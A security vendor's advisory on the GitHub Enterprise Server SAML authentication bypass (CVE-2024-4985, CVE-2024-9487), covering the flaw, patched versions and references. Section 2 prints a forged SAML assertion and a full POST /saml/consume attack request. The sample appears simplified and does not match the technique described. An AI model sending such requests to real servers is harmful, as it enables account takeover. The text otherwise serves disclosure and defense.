Vulnerability report written by the TA team by analyzing "Github Enterprise Server Authentication Bypass"

---

The vulnerability is an authentication bypass vulnerability in the Github Enterprise Server (GHES), which can lead to an attack that bypasses signature verification operations and accesses GHES arbitrary accounts by sending crafted SAML requests to GHES services with SAML SSO authentication and encryption assistance enabled. The vulnerabilities were patched in GHES 3.11.16, 3.12.10, 3.13.5 and 3.14.2, and AIWAF is continuously monitoring related vulnerabilities.

---

1. Overview

Github, a service that provides hosting capabilities for Git, a distributed version control tool, has published an analysis of CVE-2024-4985 and CVE-2024-9487, authentication bypass vulnerabilities in Github Enterprise Server (GHES), the service's paid plan. Source : https://projectdiscovery.io/blog/github-enterprise-saml-authentication-bypass

---

2. Attack Type

Github Enterprise Server (GHES) uses SAML SSO authentication and the cryptographic assertion feature for the authentication process. The cryptographic assertion feature is disabled by default, but GHES with it enabled is affected by this vulnerability. In GHES with the encrypted assertion feature enabled, the authentication process checks whether there is a signature outside the assertion block, and whether the identity of the entire signature and parent assertion in the block match to prevent an attacker from manipulating the signature to insert a malicious assertion. However, the verification process does not verify the assertion signature itself, which could allow an attacker to bypass the verification process by obtaining a valid SAMLResponse from the IDP and appending a fake assertion node to that SAML to fake the presence of an encrypted assertion signature, thus gaining access to a GHES arbitrary account. SAML data written to an arbitrary GHES URL (https://your-ghes-instance.com):

<Assertion ID="1234567890" IssueInstant="2024-05-21T06:40:00Z" Subject="CN=John Doe,OU=Users,O=Acme Corporation,C=US">
  <Audience>https://your-ghes-instance.com</Audience>
  <SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:assertion:method:bearer">
    <SubjectConfirmationData>
      <NameID Type="urn:oasis:names:tc:SAML:2.0:nameid-type:persistent" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:basic">jdoe</NameID>
    </SubjectConfirmationData>
  </SubjectConfirmation>
  <AuthnStatement AuthnInstant="2024-05-21T06:40:00Z" AuthnContextClassRef="urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextClassRef:unspecified">
    <AuthnMethod>urn:oasis:names:tc:SAML:2.0:methodName:password</AuthnMethod>
  </AuthnStatement>
  <AttributeStatement>
    <Attribute Name="urn:oid:1.3.6.1.4.1.11.2.17.19.3.4.0.10">Acme Corporation</Attribute>
    <Attribute Name="urn:oid:1.3.6.1.4.1.11.2.17.19.3.4.0.4">jdoe@acme.com</Attribute>
  </AttributeStatement>
</Assertion>

Nuclei template-based attack Request :

POST /saml/consume HTTP/1.1
Content-Length: 1227
Content-Type: application/x-www-form-urlencoded
Cookie: saml_csrf_token=sample_token; saml_csrf_token_legacy=sample_token
Host: www.test.com
User-Agent: HTTPie

RelayState=sample_token&SAMLResponse=%3CAssertion+ID%3D%221234567890%22+IssueInstant%3D%222024-05-21T06%3A40%3A00Z%22+Subject%3D%22CN%3DJohn+Doe%2COU%3DUsers%2CO%3DAcme+Corporation%2CC%3DUS%22%3E%3CAudience%3Ehttps%3A%2F%2Fyour-ghes-instance.com%3C%2FAudience%3E%3CSubjectConfirmation+Method%3D%22urn%3Aoasis%3Anames%3Atc%3ASAML%3A2.0%3Aassertion%3Amethod%3Abearer%22%3E%3CSubjectConfirmationData%3E%3CNameID+Type%3D%22urn%3Aoasis%3Anames%3Atc%3ASAML%3A2.0%3Anameid-type%3Apersistent%22+Format%3D%22urn%3Aoasis%3Anames%3Atc%3ASAML%3A2.0%3Anameid-format%3Abasic%22%3Ejdoe%3C%2FNameID%3E%3C%2FSubjectConfirmationData%3E%3C%2FSubjectConfirmation%3E%3CAuthnStatement+AuthnInstant%3D%222024-05-21T06%3A40%3A00Z%22+AuthnContextClassRef%3D%22urn%3Aoasis%3Anames%3Atc%3ASAML%3A2.0%3Aassertion%3AAuthnContextClassRef%3Aunspecified%22%3E%3CAuthnMethod%3Eurn%3Aoasis%3Anames%3Atc%3ASAML%3A2.0%3AmethodName%3Apassword%3C%2FAuthnMethod%3E%3C%2FAuthnStatement%3E%3CAttributeStatement%3E%3CAttribute+Name%3D%22urn%3Aoid%3A1.3.6.1.4.1.11.2.17.19.3.4.0.10%22%3EAcme+Corporation%3C%2FAttribute%3E%3CAttribute+Name%3D%22urn%3Aoid%3A1.3.6.1.4.1.11.2.17.19.3.4.0.4%22%3Ejdoe%40acme.com%3C%2FAttribute%3E%3C%2FAttributeStatement%3E%3C%2FAssertion%3E

---

3. Response

The vulnerability was fixed in GHES versions 3.9.15, 3.10.12, 3.11.10, and 3.12.4 with CVE-2024-4985 upon initial disclosure, but was found to be incompletely addressed in a fix patch and was fixed again in GHES versions 3.11.16, 3.12.10, 3.13.5, and 3.14.2 with CVE-2024-9487. The vulnerability bypasses the validation step by injecting a crafted, fake assertion node, and is not considered a patternable area as AIWAF is likely to detect legitimate requests when responding with patterns.

---

4. Conclusion

Github Enterprise Server is a hosted service on the Github platform and is used by many customers and organizations, so an authentication bypass vulnerability in this service is a high impact and high impact vulnerability, and organizations and customers using Github Enterprise Server should ensure that they are always patched to the latest version. Our AIWAF products continue to monitor Github and Github Enterprise Server for vulnerabilities, and we will continue to respond to relevant vulnerabilities as they are discovered.

---

5. References

• https://projectdiscovery.io/blog/github-enterprise-saml-authentication-bypass
• https://github.com/absholi7ly/Bypass-authentication-GitHub-Enterprise-Server
• https://hawk-eye.io/2024/05/cve-2024-4985-github-enterprise-server-authentication-bypass-vulnerability/
• https://hawk-eye.io/2024/10/cve-2024-9487-critical-vulnerability-affecting-github-enterprise-server/